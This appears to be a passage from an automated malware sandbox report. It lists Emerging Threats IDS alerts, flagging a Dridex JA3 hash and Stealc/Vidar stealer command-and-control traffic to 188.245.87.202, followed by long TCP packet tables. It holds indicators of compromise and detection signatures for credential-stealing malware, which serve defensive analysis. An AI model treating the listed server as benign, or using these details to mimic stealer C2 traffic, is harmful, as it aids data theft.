                                                                        2024-08-05T18:56:35.159350+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49735443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:04.615928+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49722443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:44.328736+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49744443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:59.114134+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49719443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:47.466732+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49747443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:54.663227+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49716443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:22.171975+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49732443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:26.168708+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49734443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:39.235253+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49739443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:19.713700+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49730443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:46.372825+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49746443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:52.926886+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49751443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:38.198914+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49738443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:58.307206+0200TCP2051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M144349718188.245.87.202192.168.2.5
                                                                        2024-08-05T18:56:13.087106+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49727443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:11.170074+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49726443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:36.234067+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49736443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:55.352655+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST49716443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:40.332124+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49740443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:43.444404+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49743443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:57.620373+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49718443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:05.840854+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49723443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:41.322529+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49741443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:03.317760+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49721443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:20.793047+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49731443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:23.785268+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49733443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:07.183514+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49724443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:55:56.754342+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config44349717188.245.87.202192.168.2.5
                                                                        2024-08-05T18:56:45.398883+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49745443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:14.802464+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49728443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:16.411777+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49729443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:49.549343+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49749443192.168.2.5188.245.87.202
                                                                        2024-08-05T18:56:00.308967+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49720443192.168.2.5188.245.87.202

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Aug 5, 2024 18:55:49.008832932 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:49.008878946 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:49.008960962 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:49.018925905 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:49.018939972 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:49.757499933 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:49.757817030 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:49.830049038 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:49.830079079 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:49.830538988 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:49.830605984 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:49.832839966 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:49.876506090 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.505265951 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.505326033 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.505361080 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.505369902 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.505433083 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.505472898 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.505472898 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.505517960 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.611156940 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.611186028 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.611310005 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.611336946 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.611387968 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.616117954 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.616189003 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.616194010 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.616238117 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.616265059 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.616309881 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.616445065 CEST49712443192.168.2.5104.102.49.249
                                                                        Aug 5, 2024 18:55:50.616460085 CEST44349712104.102.49.249192.168.2.5
                                                                        Aug 5, 2024 18:55:50.629802942 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:50.629899979 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:50.629992962 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:50.630295038 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:50.630330086 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:51.591371059 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:51.591527939 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:51.595036030 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:51.595067978 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:51.595495939 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:51.595566988 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:51.595865965 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:51.636538029 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:52.335156918 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:52.335253000 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:52.335254908 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:52.335474968 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:52.338291883 CEST49713443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:52.338332891 CEST44349713188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:52.340508938 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:52.340540886 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:52.340606928 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:52.340847015 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:52.340861082 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.040375948 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.040452003 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.040973902 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.040981054 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.043076038 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.043081999 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.725547075 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.725646973 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.725678921 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.725703001 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.725846052 CEST49715443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.725862980 CEST44349715188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.727296114 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.727386951 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:53.727480888 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.727881908 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:53.727931976 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:54.663137913 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:54.663227081 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:54.667434931 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:54.667448044 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:54.670157909 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:54.670166969 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:55.352703094 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:55.352741957 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:55.352812052 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:55.352819920 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:55.352832079 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:55.352874041 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:55.353210926 CEST49716443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:55.353225946 CEST44349716188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:55.354744911 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:55.354777098 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:55.354851961 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:55.355041981 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:55.355051994 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.073147058 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.073425055 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.073837996 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.073846102 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.075748920 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.075753927 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.753890038 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.753962994 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.754117012 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.754127979 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.754173994 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.754539967 CEST49717443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.754560947 CEST44349717188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.755968094 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.755989075 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:56.758752108 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.759196043 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:56.759208918 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:57.616122961 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:57.620373011 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:57.620749950 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:57.620760918 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:57.622476101 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:57.622481108 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:58.306967020 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:58.307079077 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:58.307086945 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:58.307126999 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:58.307297945 CEST49718443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:58.307312965 CEST44349718188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:58.391021013 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:58.391094923 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:58.391194105 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:58.391463995 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:58.391499996 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.113890886 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.114134073 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.114471912 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.114500999 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.116128922 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.116142988 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.116187096 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.116206884 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.630709887 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.630747080 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.630958080 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.631092072 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.631100893 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.858725071 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.858911991 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:55:59.858968019 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.858999968 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.860048056 CEST49719443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:55:59.860069036 CEST44349719188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.308861971 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.308967113 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.309484005 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.309508085 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.311147928 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.311161041 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.739892960 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.739965916 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.739981890 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.740004063 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.740029097 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.740032911 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.740067005 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.740072012 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.740103960 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.740137100 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.771260023 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.771318913 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.771380901 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.771388054 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.771449089 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.839710951 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.839740038 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.839837074 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.839845896 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.839890003 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.871107101 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.871153116 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.871210098 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.871225119 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.871268988 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.871292114 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.910928011 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.910969019 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.911163092 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.911163092 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.911184072 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.911242008 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.938523054 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.938538074 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.938621044 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.938637018 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.938694954 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.958889961 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.958929062 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.959110975 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.959125042 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.959309101 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.974509954 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.974553108 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.974783897 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.974785089 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.974802017 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.974857092 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.995697975 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.995742083 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.995789051 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.995803118 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:00.995836973 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:00.995872974 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.011370897 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.011395931 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.011600971 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.011614084 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.011842966 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.025041103 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.025084019 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.025131941 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.025149107 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.025322914 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.025322914 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.040385008 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.040430069 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.040699959 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.040713072 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.040775061 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.053015947 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.053057909 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.053114891 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.053127050 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.053289890 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.053289890 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.062122107 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.062165976 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.062211990 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.062225103 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.062278986 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.062278986 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.072433949 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.072474957 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.072515011 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.072526932 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.072690964 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.072690964 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.080535889 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.080578089 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.080624104 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.080636024 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.080665112 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.080682993 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.089278936 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.089340925 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.089368105 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.089379072 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.089428902 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.089428902 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.097851038 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.097893000 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.097964048 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.097975016 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.098004103 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.098035097 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.108711958 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.108751059 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.108800888 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.108814001 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.108841896 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.108866930 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.125291109 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.125350952 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.125406981 CEST49720443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:01.125417948 CEST44349720188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:01.125444889 CEST49720443192.168.2.5188.245.87.202
